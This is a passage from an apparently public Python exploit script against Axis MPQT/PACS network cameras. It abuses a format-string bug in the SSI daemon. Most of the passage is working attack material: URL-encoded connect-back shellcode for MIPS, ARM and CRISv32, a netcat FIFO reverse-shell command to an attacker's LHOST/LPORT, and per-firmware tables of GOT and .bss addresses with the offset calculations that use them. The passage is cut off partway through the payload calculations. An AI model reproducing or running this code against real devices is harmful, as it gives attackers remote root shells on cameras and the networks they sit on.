# Connect-timeout in seconds
timeout = 5
socket.setdefaulttimeout(timeout)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
tmp = self.host.split(':')
HOST = tmp[0]
PORT = int(tmp[1])
if self.verbose:
print "[Verbose] Sending to:", HOST
print "[Verbose] Port:", PORT
print "[Verbose] URI:",uri
s.connect((HOST, PORT))
s.send("GET %s HTTP/1.0\r\n\r\n" % uri)
html = (s.recv(4096)) # We really do not care whats coming back
# if html:
# print "[i] Received:",html
s.shutdown(3)
s.close()
return html
def Send(self, uri):
# The SSI daemon are looking for this, and opens a new FD (5), but this does'nt actually
# matter for the functionality of this exploit, only for future references.
headers = {
'User-Agent' : 'MSIE',
}
# Connect-timeout in seconds
timeout = 5
socket.setdefaulttimeout(timeout)
url = '%s://%s%s' % (self.proto, self.host, uri)
if self.verbose:
print "[Verbose] Sending:", url
if self.proto == 'https':
if hasattr(ssl, '_create_unverified_context'):
print "[i] Creating SSL Default Context"
ssl._create_default_https_context = ssl._create_unverified_context
if self.credentials:
Basic_Auth = self.credentials.split(':')
if self.verbose:
print "[Verbose] User:",Basic_Auth[0],"Password:",Basic_Auth[1]
try:
pwd_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm()
pwd_mgr.add_password(None, url, Basic_Auth[0], Basic_Auth[1])
auth_handler = urllib2.HTTPBasicAuthHandler(pwd_mgr)
opener = urllib2.build_opener(auth_handler)
urllib2.install_opener(opener)
except Exception as e:
print "[!] Basic Auth Error:",e
sys.exit(1)
if self.noexploit and not self.verbose:
print "[<] 204 Not Sending!"
html = "Not sending any data"
else:
data = None
req = urllib2.Request(url, data, headers)
rsp = urllib2.urlopen(req)
if rsp:
print "[<] %s OK" % rsp.code
html = rsp.read()
return html
class shellcode_db:
def __init__(self,targetIP,verbose):
self.targetIP = targetIP
self.verbose = verbose
def sc(self,target):
self.target = target
# Connect back shellcode
#
# CRISv32: Written by myself, no shellcode availible out on "The Internet"
# NCSH: My PoC of netcat FIFO / PIPE reverese shell, w/o '-e' option and with $IFS as separators
# MIPSel: Written by Jacob Holcomb (url encoded by me)
# ARM: http://shell-storm.org/shellcode/files/shellcode-754.php
#
# Slightly modified syscall's
MIPSel = string.join([
#close stdin
"%ff%ff%04%28" #slti a0,zero,-1
"%a6%0f%02%24" #li v0,4006
"%4c%f7%f7%03" #syscall 0xdfdfd
#close stdout
"%11%11%04%28" #slti a0,zero,4369
"%a6%0f%02%24" #li v0,4006
"%4c%f7%f7%03" #syscall 0xdfdfd
#close stderr
"%fd%ff%0c%24" #li t4,-3
"%27%20%80%01" #nor a0,t4,zero
"%a6%0f%02%24" #li v0,4006
"%4c%f7%f7%03" #syscall 0xdfdfd
# socket AF_INET (2)
"%fd%ff%0c%24" #li t4,-3
"%27%20%80%01" #nor a0,t4,zero
"%27%28%80%01" #nor a1,t4,zero
"%ff%ff%06%28" #slti a2,zero,-1
"%57%10%02%24" #li v0,4183
"%4c%f7%f7%03" #syscall 0xdfdfd
#
"%ff%ff%44%30" # andi $a0, $v0, 0xFFFF
#
# dup2 stdout
"%c9%0f%02%24" #li v0,4041
"%4c%f7%f7%03" #syscall 0xdfdfd
#
# dup2 stderr
"%c9%0f%02%24" #li v0,4041
"%4c%f7%f7%03" #syscall 0xdfdfd
#
# Port
"PP1PP0%05%3c"
"%01%ff%a5%34"
#
"%01%01%a5%20" #addi a1,a1,257
"%f8%ff%a5%af" #sw a1,-8(sp)
#
# IP
"IP3IP4%05%3c"
"IP1IP2%a5%34"
#
"%fc%ff%a5%af" #sw a1,-4(sp)
"%f8%ff%a5%23" #addi a1,sp,-8
"%ef%ff%0c%24" #li t4,-17
"%27%30%80%01" #nor a2,t4,zero
"%4a%10%02%24" #li v0,4170
"%4c%f7%f7%03" #syscall 0xdfdfd
#
"%62%69%08%3c" #lui t0,0x6962
"%2f%2f%08%35" #ori t0,t0,0x2f2f
"%ec%ff%a8%af" #sw t0,-20(sp)
"%73%68%08%3c" #lui t0,0x6873
"%6e%2f%08%35" #ori t0,t0,0x2f6e
"%f0%ff%a8%af" #sw t0,-16(sp
"%ff%ff%07%28" #slti a3,zero,-1
"%f4%ff%a7%af" #sw a3,-12(sp)
"%fc%ff%a7%af" #sw a3,-4(sp
"%ec%ff%a4%23" #addi a0,sp,-20
"%ec%ff%a8%23" #addi t0,sp,-20
"%f8%ff%a8%af" #sw t0,-8(sp)
"%f8%ff%a5%23" #addi a1,sp,-8
"%ec%ff%bd%27" #addiu sp,sp,-20
"%ff%ff%06%28" #slti a2,zero,-1
"%ab%0f%02%24" #li v0,4011 (execve)
"%4c%f7%f7%03" #syscall 0xdfdfd
], '')
# Working netcat shell
# - $PATH will locate 'mkfifo', 'nc' and 'rm'
# - LHOST / LPORT will be changed on the fly later in the code
# - 1) make FIFO, 2) netcat back to attacker with STDIN to /bin/sh, and PIPE STDOUT back to the remote via FIFO, 3) remove FIFO when exiting
# - $IFS = <space><tab><newline> [By default, and we need <space> or <tab> as separator]
# $ echo -n "$IFS" | hexdump -C
# 00000000 20 09 0a
# - $PS1 = $ [By default, and we need something to "comment" out our trailing FMS code from /bin/sh -c]
#
# '2>/tmp/s' (STDERR > FIFO) Don't work with $IFS as separator
#
# Working with Apache and Boa
# NCSH = "mkfifo$IFS/tmp/s;nc$IFS-w$IFS\"5\"$IFS\"LHOST\"$IFS\"LPORT\"$IFS0</tmp/s|/bin/sh>/tmp/s\"$IFS\"2>/tmp/s;rm$IFS/tmp/s;$PS1"
NCSH = "mkfifo$IFS/tmp/s;nc$IFS-w$IFS\"5\"$IFS\"LHOST\"$IFS\"LPORT\"$IFS0</tmp/s|/bin/sh>/tmp/s;rm$IFS/tmp/s;$PS1"
ARMel = string.join([
# original: http://shell-storm.org/shellcode/files/shellcode-754.php
# 32-bit instructions, enter thumb mode
"%01%10%8f%e2" # add r1, pc, #1
"%11%ff%2f%e1" # bx r1
# 16-bit thumb instructions follow
#
# socket(2, 1, 0)
"%02%20" #mov r0, #2
"%01%21" #mov r1, #1
"%92%1a" #sub r2, r2, r2
"%0f%02" #lsl r7, r1, #8
"%19%37" #add r7, r7, #25
"%01%df" #svc 1
#
# connect(r0, &addr, 16)
"%06%1c" #mov r6, r0
"%08%a1" #add r1, pc, #32
"%10%22" #mov r2, #16
"%02%37" #add r7, #2
"%01%df" #svc 1
#
# dup2(r0, 0/1/2)
"%3f%27" #mov r7, #63
"%02%21" #mov r1, #2
#
#lb:
"%30%1c" #mov r0, r6
"%01%df" #svc 1
"%01%39" #sub r1, #1
"%fb%d5" #bpl lb
#
# execve("/bin/sh", ["/bin/sh", 0], 0)
"%05%a0" #add r0, pc, #20
"%92%1a" #sub r2, r2, r2
"%05%b4" #push {r0, r2}
"%69%46" #mov r1, sp
"%0b%27" #mov r7, #11
"%01%df" #svc 1
#
"%c0%46" # .align 2 (NOP)
"%02%00" # .short 0x2 (struct sockaddr)
"PP1PP0" # .short 0x3412 (port: 0x1234)
"IP1IP2IP3IP4" #.byte 192,168,57,1 (ip: 192.168.57.1)
# .ascii "/bin/sh\0\0"
"%2f%62%69%6e" # /bin
"%2f%73%68%00%00" # /sh\x00\x00
"%00%00%00%00"
"%c0%46"
], '')
# Connect-back shell for Axis CRISv32
# Written by mcw noemail eu 2016
#
CRISv32 = string.join([
#close(0)
"%7a%86" # clear.d r10
"%5f%9c%06%00" # movu.w 0x6,r9
"%3d%e9" # break 13
#close(1)
"%41%a2" # moveq 1,r10
"%5f%9c%06%00" # movu.w 0x6,r9
"%3d%e9" # break 13
#close(2)
"%42%a2" # moveq 2,r10
"%5f%9c%06%00" # movu.w 0x6,r9
"%3d%e9" # break 13
#
"%10%e1" # addoq 16,sp,acr
"%42%92" # moveq 2,r9
"%df%9b" # move.w r9,[acr]
"%10%e1" # addoq 16,sp,acr
"%02%f2" # addq 2,acr
#PORT
"%5f%9ePP1PP0" # move.w 0xPP1PP0,r9 #
"%df%9b" # move.w r9,[acr]
"%10%e1" # addoq 16,sp,acr
"%6f%96" # move.d acr,r9
"%04%92" # addq 4,r9
#IP
"%6f%feIP1IP2IP3IP4" # move.d IP4IP3IP2IP1,acr
"%e9%fb" # move.d acr,[r9]
#
#socket()
"%42%a2" # moveq 2,r10
"%41%b2" # moveq 1,r11
"%7c%86" # clear.d r12
"%6e%96" # move.d $sp,$r9
"%e9%af" # move.d $r10,[$r9+]
"%e9%bf" # move.d $r11,[$r9+]
"%e9%cf" # move.d $r12,[$r9+]
"%41%a2" # moveq 1,$r10
"%6e%b6" # move.d $sp,$r11
"%5f%9c%66%00" # movu.w 0x66,$r9
"%3d%e9" # break 13
#
"%6a%96" # move.d $r10,$r9
"%0c%e1" # addoq 12,$sp,$acr
"%ef%9b" # move.d $r9,[$acr]
"%0c%e1" # addoq 12,$sp,$acr
"%6e%96" # move.d $sp,$r9
"%10%92" # addq 16,$r9
"%6f%aa" # move.d [$acr],$r10
"%69%b6" # move.d $r9,$r11
"%50%c2" # moveq 16,$r12
#
# connect()
"%6e%96" # move.d $sp,$r9
"%e9%af" # move.d $r10,[$r9+]
"%e9%bf" # move.d $r11,[$r9+]
"%e9%cf" # move.d $r12,[$r9+]
"%43%a2" # moveq 3,$r10
"%6e%b6" # move.d $sp,$r11
"%5f%9c%66%00" # movu.w 0x66,$r9
"%3d%e9" # break 13
# dup(0) already in socket
#dup(1)
"%6f%aa" # move.d [$acr],$r10
"%41%b2" # moveq 1,$r11
"%5f%9c%3f%00" # movu.w 0x3f,$r9
"%3d%e9" # break 13
#
#dup(2)
"%6f%aa" # move.d [$acr],$r10
"%42%b2" # moveq 2,$r11
"%5f%9c%3f%00" # movu.w 0x3f,$r9
"%3d%e9" # break 13
#
#execve("/bin/sh",NULL,NULL)
"%90%e2" # subq 16,$sp
"%6e%96" # move.d $sp,$r9
"%6e%a6" # move.d $sp,$10
"%6f%0e%2f%2f%62%69" # move.d 69622f2f,$r0
"%e9%0b" # move.d $r0,[$r9]
"%04%92" # addq 4,$r9
"%6f%0e%6e%2f%73%68" # move.d 68732f6e,$r0
"%e9%0b" # move.d $r0,[$r9]
"%04%92" # addq 4,$r9
"%79%8a" # clear.d [$r9]
"%04%92" # addq 4,$r9
"%79%8a" # clear.d [$r9]
"%04%92" # addq 4,$r9
"%e9%ab" # move.d $r10,[$r9]
"%04%92" # addq 4,$r9
"%79%8a" # clear.d [$r9]
"%10%e2" # addq 16,$sp
"%6e%f6" # move.d $sp,$acr
"%6e%96" # move.d $sp,$r9
"%6e%b6" # move.d $sp,$r11
"%7c%86" # clear.d $r12
"%4b%92" # moveq 11,$r9
"%3d%e9" # break 13
], '')
if self.target == 'MIPSel':
return MIPSel
elif self.target == 'ARMel':
return ARMel
elif self.target == 'CRISv32':
return CRISv32
elif self.target == 'NCSH1':
return NCSH
elif self.target == 'NCSH2':
return NCSH
else:
print "[!] Unknown shellcode! (%s)" % str(self.target)
sys.exit(1)
class FMSdb:
def __init__(self,targetIP,verbose):
self.targetIP = targetIP
self.verbose = verbose
def FMSkey(self,target):
self.target = target
target_db = {
#-----------------------------------------------------------------------
# All pointing from free() GOT to shellcode on .bss (Except ARM with NCSH)
#-----------------------------------------------------------------------
#
# Using POP format string, AKA 'Old Style'
#
# MPQT
'MIPS-5.85.x': [
0x41f370, # Adjust to GOT free() address
0x420900, # .bss shellcode address
2, # 1st POP's
2, # 2nd POP's
'axi', # Aligns injected code
700, # How big buffer before shellcode
'MIPSel' # Shellcode type
],
# MPQT
'MIPS-5.40.3': [
0x41e41c, # Adjust to GOT free() address
0x4208cc, # .bss shellcode address
7, # 1st POP's
11, # 2nd POP's
'ax', # Aligns injected code
450, # How big buffer before shellcode
'MIPSel' # Shellcode type
],
# MPQT
'MIPS-5.4x': [
0x41e4cc, # Adjust to GOT free() address
0x42097c, # .bss shellcode address
7, # 1st POP's
11, # 2nd POP's
'ax', # Aligns injected code
450, # How big buffer before shellcode
'MIPSel' # Shellcode type
],
# MPQT
'MIPS-5.5x': [
0x41d11c, # Adjust to GOT free() address
0x41f728, # .bss shellcode address
5, # 1st POP's
15, # 2nd POP's
'axis', # Aligns injected code
700, # How big buffer before shellcode
'MIPSel' # Shellcode type
],
# MPQT
'MIPS-5.55x': [
0x41d11c, # Adjust to GOT free() address
0x41f728, # .bss shellcode address
11, # 1st POP's
9, # 2nd POP's
'axis', # Aligns injected code
700, # How big buffer before shellcode
'MIPSel' # Shellcode type
],
# Shared with MPQT and PACS
'MIPS-5.6x': [
0x41d048, # Adjust to GOT free() address
0x41f728, # .bss shellcode address
5, # 1st POP's
15, # 2nd POP's
'axis', # Aligns injected code
700, # How big buffer before shellcode
'MIPSel' # Shellcode type
],
# MPQT
'MIPS-5.7x': [
0x41d04c, # Adjust to GOT free() address
0x41f718, # .bss shellcode address
2, # 1st POP's
14, # 2nd POP's
'axis', # Aligns injected code
700, # How big buffer before shellcode
'MIPSel' # Shellcode type
],
# MPQT
'MIPS-5.75x': [
0x41c498, # Adjust to GOT free() address
0x41daf0, # .bss shellcode address
3, # 1st POP's
13, # 2nd POP's
'axi', # Aligns injected code
700, # How big buffer before shellcode
'MIPSel' # Shellcode type
],
# Shared with MPQT and PACS
'MIPS-5.8x': [
0x41d0c0, # Adjust to GOT free() address
0x41e740, # .bss shellcode address
3, # 1st POP's
13, # 2nd POP's
'axi', # Aligns injected code
700, # How big buffer before shellcode
'MIPSel' # Shellcode type
],
# MPQT
'MIPS-5.9x': [
0x41d0c0, # Adjust to GOT free() address
0x41e750, # .bss shellcode address
3, # 1st POP's
13, # 2nd POP's
'axi', # Aligns injected code
700, # How big buffer before shellcode
'MIPSel' # Shellcode type
],
# MPQT
'MIPS-6.1x': [
0x41c480, # Adjust to GOT free() address
0x41dac0, # .bss shellcode address
3, # 1st POP's
13, # 2nd POP's
'axi', # Aligns injected code
700, # How big buffer before shellcode
'MIPSel' # Shellcode type
],
# MPQT
'MIPS-6.2x': [
0x41e578, # Adjust to GOT free() address
0x41fae0, # .bss shellcode address
2, # 1st POP's
2, # 2nd POP's
'axi', # Aligns injected code
700, # How big buffer before shellcode
'MIPSel' # Shellcode type
],
# MPQT
'MIPS-6.20x': [
0x41d0c4, # Adjust to GOT free() address
0x41e700, # .bss shellcode address
3, # 1st POP's
13, # 2nd POP's
'axi', # Aligns injected code
700, # How big buffer before shellcode
'MIPSel' # Shellcode type
],
# PACS
'MIPS-1.3x': [
0x41e4cc, # Adjust to GOT free() address
0x420a78, # .bss shellcode address
7, # 1st POP's
11, # 2nd POP's
'axis', # Aligns injected code
700, # How big buffer before shellcode
'MIPSel' # Shellcode type
],
# PACS
'MIPS-1.1x': [
0x41e268, # Adjust to GOT free() address
0x420818, # .bss shellcode address
7, # 1st POP's
11, # 2nd POP's
'axis', # Aligns injected code
700, # How big buffer before shellcode
'MIPSel' # Shellcode type
],
#
# Tested with execstack to set executable stack flag bit on bin's and lib's
#
# These two 'Old Style' are not used in the exploit, but kept here as reference as they has been confirmed working.
#
# ARMel with bin/libs executable stack flag set with 'execstack'
# MPQT
'ARM-5.50x': [ #
0x1c1b4, # Adjust to GOT free() address
0x1e7c8, # .bss shellcode address
93, # 1st POP's
1, # 2nd POP's
'axis', # Aligns injected code
700, # How big buffer before shellcode
'ARMel' # Shellcode type (ARMel)
],
# ARMel with bin/libs executable stack flag set with 'execstack'
# MPQT
'ARM-5.55x': [ #
0x1c15c, # Adjust to GOT free() address
0x1e834, # .bss shellcode address
59, # 1st POP's
80, # 2nd POP's
'axis', # Aligns injected code
800, # How big buffer before shellcode
'ARMel' # Shellcode type (ARMel)
],
#
# Using direct parameter access format string, AKA 'New Style'
#
# MPQT
'ARM-NCSH-5.20x': [ # AXIS P1311 5.20 (id=root)
0x1c1b4, # Adjust to GOT free() address
0x10178, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()"
61, # 1st POP's
115, # 2nd POP's
143, # 3rd POP's
118, # 4th POP's
'NCSH2' # Shellcode type (Netcat Shell)
],
# MPQT
'ARM-NCSH-5.2x': [ #
0x1c1b4, # Adjust to GOT free() address
0x1013c, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()"
61, # 1st POP's
115, # 2nd POP's
143, # 3rd POP's
118, # 4th POP's
'NCSH2' # Shellcode type (Netcat Shell)
],
# MPQT
'ARM-NCSH-5.4x': [ #
0x1c1b4, # Adjust to GOT free() address
0x101fc, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()"
61, # 1st POP's
115, # 2nd POP's
143, # 3rd POP's
118, # 4th POP's
'NCSH2' # Shellcode type (Netcat Shell)
],
#
# Using POP format string, AKA 'Old Style'
#
# MPQT
'ARM-NCSH-5.5x': [ #
0x1c15c, # Adjust to GOT free() address
0xfdcc, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()"
97, # 1st POP's
0, # 2nd POP's
41, # 3rd POP's
0, # 4th POP's
'NCSH1' # Shellcode type (Netcat Shell)
],
# MPQT
'ARM-NCSH-5.6x': [ #
0x1c15c, # Adjust to GOT free() address
0xfcec, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()"
97, # 1st POP's
0, # 2nd POP's
41, # 3rd POP's
0, # 4th POP's
'NCSH1' # Shellcode type (Netcat Shell)
],
# MPQT
'ARM-NCSH-5.7x': [ #
0x1c1c0, # Adjust to GOT free() address
0xf800, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()"
132, # 1st POP's
0, # 2nd POP's
34, # 3rd POP's
0, # 4th POP's
'NCSH1' # Shellcode type (Netcat Shell)
],
# Will go in endless loop after exit of nc shell... DoS sux
# MPQT
'ARM-NCSH-5.8x': [ #
0x1b39c, # Adjust to GOT free() address
0xf8c0, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()"
98, # 1st POP's
0, # 2nd POP's
34, # 3rd POP's
1, # 4th POP's
'NCSH1' # Shellcode type (Netcat Shell)
],
# MPQT
'ARM-NCSH-6.1x': [ #
0x1d2a4, # Adjust to GOT free() address
# 0xecc4, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()"
0xecc8, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()"
106, # 1st POP's
0, # 2nd POP's
34, # 3rd POP's
1, # 4th POP's
'NCSH1' # Shellcode type (Netcat Shell)
],
#
# Using POP format string, AKA 'Old Style'
#
# MPQT
'CRISv32-5.5x': [ #
0x8d148, # Adjust to GOT free() address
0x8f5a8, # .bss shellcode address
4, # 1st POP's
13, # 2nd POP's
'axis', # Aligns injected code
470, # How big buffer before shellcode
'CRISv32' # Shellcode type (Crisv32)
],
# MPQT
'CRISv32-5.4x': [ #
0x8d0e0, # Adjust to GOT free() address
0x8f542, # .bss shellcode address
4, # 1st POP's
13, # 2nd POP's
'axis', # Aligns injected code
470, # How big buffer before shellcode
'CRISv32' # Shellcode type (Crisv32)
],
# MPQT
'CRISv32-5.2x': [ #
0x8d0b4, # Adjust to GOT free() address
0x8f4d6, # .bss shellcode address
4, # 1st POP's
13, # 2nd POP's
'axis', # Aligns injected code
470, # How big buffer before shellcode
'CRISv32' # Shellcode type (Crisv32)
],
# MPQT
'CRISv32-5.20.0': [ #
0x8d0e4, # Adjust to GOT free() address
0x8f546, # .bss shellcode address
4, # 1st POP's
13, # 2nd POP's
'axis', # Aligns injected code
470, # How big buffer before shellcode
'CRISv32' # Shellcode type (Crisv32)
]
}
if self.target == 0:
return target_db
if not self.target in target_db:
print "[!] Unknown FMS key: %s!" % self.target
sys.exit(1)
if self.verbose:
print "[Verbose] Number of availible FMS keys:",len(target_db)
return target_db
#
# Validate correctness of HOST, IP and PORT
#
class Validate:
def __init__(self,verbose):
self.verbose = verbose
# Check if IP is valid
def CheckIP(self,IP):
self.IP = IP
ip = self.IP.split('.')
if len(ip) != 4:
return False
for tmp in ip:
if not tmp.isdigit():
return False
i = int(tmp)
if i < 0 or i > 255:
return False
return True
# Check if PORT is valid
def Port(self,PORT):
self.PORT = PORT
if int(self.PORT) < 1 or int(self.PORT) > 65535:
return False
else:
return True
# Check if HOST is valid
def Host(self,HOST):
self.HOST = HOST
try:
# Check valid IP
socket.inet_aton(self.HOST) # Will generate exeption if we try with FQDN or invalid IP
# Or we check again if it is correct typed IP
if self.CheckIP(self.HOST):
return self.HOST
else:
return False
except socket.error as e:
# Else check valid DNS name, and use the IP address
try:
self.HOST = socket.gethostbyname(self.HOST)
return self.HOST
except socket.error as e:
return False
if __name__ == '__main__':
#
# Help, info and pre-defined values
#
INFO = '[Axis Communications MPQT/PACS remote exploit 2016 bashis <mcw noemail eu>]'
HTTP = "http"
HTTPS = "https"
proto = HTTP
verbose = False
noexploit = False
lhost = '192.168.0.1' # Default Local HOST
lport = '31337' # Default Local PORT
rhost = '192.168.0.90' # Default Remote HOST
rport = '80' # Default Remote PORT
# Not needed for the SSI exploit, here for possible future usage.
# creds = 'root:pass'
creds = False
#
# Try to parse all arguments
#
try:
arg_parser = argparse.ArgumentParser(
# prog=sys.argv[0],
prog='axis-ssid-PoC.py',
description=('[*]' + INFO + '\n'))
arg_parser.add_argument('--rhost', required=False, help='Remote Target Address (IP/FQDN) [Default: '+ rhost +']')
arg_parser.add_argument('--rport', required=False, help='Remote Target HTTP/HTTPS Port [Default: '+ rport +']')
arg_parser.add_argument('--lhost', required=False, help='Connect Back Address (IP/FQDN) [Default: '+ lhost +']')
arg_parser.add_argument('--lport', required=False, help='Connect Back Port [Default: '+ lport + ']')
arg_parser.add_argument('--fms', required=False, help='Manual FMS key')
if creds:
arg_parser.add_argument('--auth', required=False, help='Basic Authentication [Default: '+ creds + ']')
arg_parser.add_argument('--https', required=False, default=False, action='store_true', help='Use HTTPS for remote connection [Default: HTTP]')
arg_parser.add_argument('-v','--verbose', required=False, default=False, action='store_true', help='Verbose mode [Default: False]')
arg_parser.add_argument('--noexploit', required=False, default=False, action='store_true', help='Simple testmode; With --verbose testing all code without exploiting [Default: False]')
arg_parser.add_argument('--dict', required=False, default=False, action='store_true', help='Print FMS keys and stats from dictionary, additional details with --verbose')
args = arg_parser.parse_args()
except Exception as e:
print INFO,"\nError: %s\n" % str(e)
sys.exit(1)
# We want at least one argument, so print out help
if len(sys.argv) == 1:
arg_parser.parse_args(['-h'])
print "\n[*]",INFO
if args.verbose:
verbose = args.verbose
# Print out info from dictionary
if args.dict:
target = FMSdb(rhost,verbose).FMSkey(0)
print "[db] Number of FMS keys:",len(target)
# Print out detailed info from dictionary
if verbose:
print "[db] Target details of FMS Keys availible for manual xploiting"
print "\n[FMS Key]\t[GOT Address]\t[BinSh Address]\t[POP1]\t[POP2]\t[POP3]\t[POP4]\t[Shellcode]"
for tmp in range(0,len(target)):
Key = sorted(target.keys())[tmp]
temp = re.split('[-]',Key)[0:10]
if temp[1] == 'NCSH':
print Key,'\t','0x{:08x}'.format(target[Key][0]),'\t','0x{:08x}'.format(target[Key][1]),'\t',target[Key][2],'\t',target[Key][3],'\t',target[Key][4],'\t',target[Key][5],'\t',target[Key][6]
print "\n[FMS Key]\t[GOT Address]\t[BSS Address]\t[POP1]\t[POP2]\t[Align]\t[Buf]\t[Shellcode]"
for tmp in range(0,len(target)):
Key = sorted(target.keys())[tmp]
temp = re.split('[-]',Key)[0:10]
if temp[1] != 'NCSH':
print Key,'\t','0x{:08x}'.format(target[Key][0]),'\t','0x{:08x}'.format(target[Key][1]),'\t',target[Key][2],'\t',target[Key][3],'\t',len(target[Key][4]),'\t',target[Key][5],'\t',target[Key][6]
print "\n"
else:
print "[db] Target FMS Keys availible for manual xploiting instead of using auto mode:"
Key = ""
for tmp in range(0,len(target)):
Key += sorted(target.keys())[tmp]
Key += ', '
print '\n',Key,'\n'
sys.exit(0)
#
# Check validity, update if needed, of provided options
#
if args.https:
proto = HTTPS
if not args.rport:
rport = '443'
if creds and args.auth:
creds = args.auth
if args.noexploit:
noexploit = args.noexploit
if args.rport:
rport = args.rport
if args.rhost:
rhost = args.rhost
if args.lport:
lport = args.lport
if args.lhost:
lhost = args.lhost
# Check if LPORT is valid
if not Validate(verbose).Port(lport):
print "[!] Invalid LPORT - Choose between 1 and 65535"
sys.exit(1)
# Check if RPORT is valid
if not Validate(verbose).Port(rport):
print "[!] Invalid RPORT - Choose between 1 and 65535"
sys.exit(1)
# Check if LHOST is valid IP or FQDN, get IP back
lhost = Validate(verbose).Host(lhost)
if not lhost:
print "[!] Invalid LHOST"
sys.exit(1)
# Check if RHOST is valid IP or FQDN, get IP back
rhost = Validate(verbose).Host(rhost)
if not rhost:
print "[!] Invalid RHOST"
sys.exit(1)
#
# Validation done, start print out stuff to the user
#
if noexploit:
print "[i] Test mode selected, no exploiting..."
if args.https:
print "[i] HTTPS / SSL Mode Selected"
print "[i] Remote target IP:",rhost
print "[i] Remote target PORT:",rport
print "[i] Connect back IP:",lhost
print "[i] Connect back PORT:",lport
rhost = rhost + ':' + rport
#
# FMS key is required into this PoC
#
if not args.fms:
print "[!] FMS key is required!"
sys.exit(1)
else:
Key = args.fms
print "[i] Trying with FMS key:",Key
#
# Prepare exploiting
#
# Look up the FMS key in dictionary and return pointer for FMS details to use
target = FMSdb(rhost,verbose).FMSkey(Key)
if target[Key][6] == 'NCSH1':
NCSH1 = target[Key][6]
NCSH2 = ""
elif target[Key][6] == 'NCSH2':
NCSH2 = target[Key][6]
NCSH1 = ""
else:
NCSH1 = ""
NCSH2 = ""
if Key == 'ARM-NCSH-5.8x':
print "\nExploit working, but will end up in endless loop after exiting remote NCSH\nDoS sux, so I'm exiting before that shit....\n\n"
sys.exit(0)
print "[i] Preparing shellcode:",str(target[Key][6])
# We don't use url encoded shellcode with Netcat shell
# This is for MIPS/CRISv32 and ARM shellcode
if not NCSH1 and not NCSH2:
FMSdata = target[Key][4] # This entry aligns the injected shellcode
# Building up the url encoded shellcode for sending to the target,
# and replacing LHOST / LPORT in shellcode to choosen values
# part of first 500 decoded bytes will be overwritten during stage #2, and since
# there is different 'tailing' on the request internally, keep it little more than needed, to be safe.
# Let it be 0x00, just for fun.
FMSdata += '%00' * target[Key][5]
# Connect back IP to url encoded
ip_hex = '%{:02x} %{:02x} %{:02x} %{:02x}'.format(*map(int, lhost.split('.')))
ip_hex = ip_hex.split()
IP1=ip_hex[0];IP2=ip_hex[1];IP3=ip_hex[2];IP4=ip_hex[3];
# Let's break apart the hex code of LPORT into two bytes
port_hex = hex(int(lport))[2:]
port_hex = port_hex.zfill(len(port_hex) + len(port_hex) % 2)
port_hex = ' '.join(port_hex[i: i+2] for i in range(0, len(port_hex), 2))
port_hex = port_hex.split()
if (target[Key][6]) == 'MIPSel':
# Connect back PORT
if len(port_hex) == 1:
PP1 = "%ff"
PP0 = '%{:02x}'.format((int(port_hex[0],16)-1))
elif len(port_hex) == 2:
# Little Endian
PP1 = '%{:02x}'.format((int(port_hex[0],16)-1))
PP0 = '%{:02x}'.format(int(port_hex[1],16))
elif (target[Key][6]) == 'ARMel': # Could be combinded with CRISv32
# Connect back PORT
if len(port_hex) == 1:
PP1 = "%00"
PP0 = '%{:02x}'.format(int(port_hex[0],16))
elif len(port_hex) == 2:
# Little Endian
PP1 = '%{:02x}'.format(int(port_hex[0],16))
PP0 = '%{:02x}'.format(int(port_hex[1],16))
elif (target[Key][6]) == 'CRISv32':
# Connect back PORT
if len(port_hex) == 1:
PP1 = "%00"
PP0 = '%{:02x}'.format(int(port_hex[0],16))
elif len(port_hex) == 2:
# Little Endian
PP1 = '%{:02x}'.format(int(port_hex[0],16))
PP0 = '%{:02x}'.format(int(port_hex[1],16))
else:
print "[!] Unknown shellcode! (%s)" % str(target[Key][6])
sys.exit(1)
# Replace LHOST / LPORT in URL encoded shellcode
shell = shellcode_db(rhost,verbose).sc(target[Key][6])
shell = shell.replace("IP1",IP1)
shell = shell.replace("IP2",IP2)
shell = shell.replace("IP3",IP3)
shell = shell.replace("IP4",IP4)
shell = shell.replace("PP0",PP0)
shell = shell.replace("PP1",PP1)
FMSdata += shell
#
# Calculate the FMS values to be used
#
# Get pre-defined values
ALREADY_WRITTEN = 40 # Already 'written' in the daemon before our FMS
# POP_SIZE = 8
POP_SIZE = 1
GOThex = target[Key][0]
BSShex = target[Key][1]
GOTint = int(GOThex)
# 'One-Write-Where-And-What'
if not NCSH1 and not NCSH2:
POP1 = target[Key][2]
POP2 = target[Key][3]
# Calculate for creating the FMS code
ALREADY_WRITTEN = ALREADY_WRITTEN + (POP1 * POP_SIZE)
GOTint = (GOTint - ALREADY_WRITTEN)
ALREADY_WRITTEN = ALREADY_WRITTEN + (POP2 * POP_SIZE)
BSSint = int(BSShex)
BSSint = (BSSint - GOTint - ALREADY_WRITTEN)
# if verbose:
# print "[Verbose] Calculated GOTint:",GOTint,"Calculated BSSint:",BSSint
# 'Two-Write-Where-And-What' using "New Style"
elif NCSH2:
POP1 = target[Key][2]
POP2 = target[Key][3]
POP3 = target[Key][4]
POP4 = target[Key][5]
POP2_SIZE = 2
# We need to count higher than provided address for the jump
BaseAddr = 0x10000 + BSShex
# Calculate for creating the FMS code
GOTint = (GOTint - ALREADY_WRITTEN)
ALREADY_WRITTEN = ALREADY_WRITTEN + GOTint
# Calculate FirstWhat value
FirstWhat = BaseAddr - (ALREADY_WRITTEN)
ALREADY_WRITTEN = ALREADY_WRITTEN + FirstWhat
# Calculate SecondWhat value, so it always is 0x20300
SecondWhat = 0x20300 - (ALREADY_WRITTEN + POP2_SIZE)
shell = shellcode_db(rhost,verbose).sc(target[Key][6])
shell = shell.replace("LHOST",lhost)
shell = shell.replace("LPORT",lport)
FirstWhat = FirstWhat - len(shell)
# if verbose:
# print "[Verbose] Calculated GOTint:",GOTint,"Calculated FirstWhat:",FirstWhat,"Calculated SecondWhat:",SecondWhat
# 'Two-Write-Where-And-What' using "Old Style"
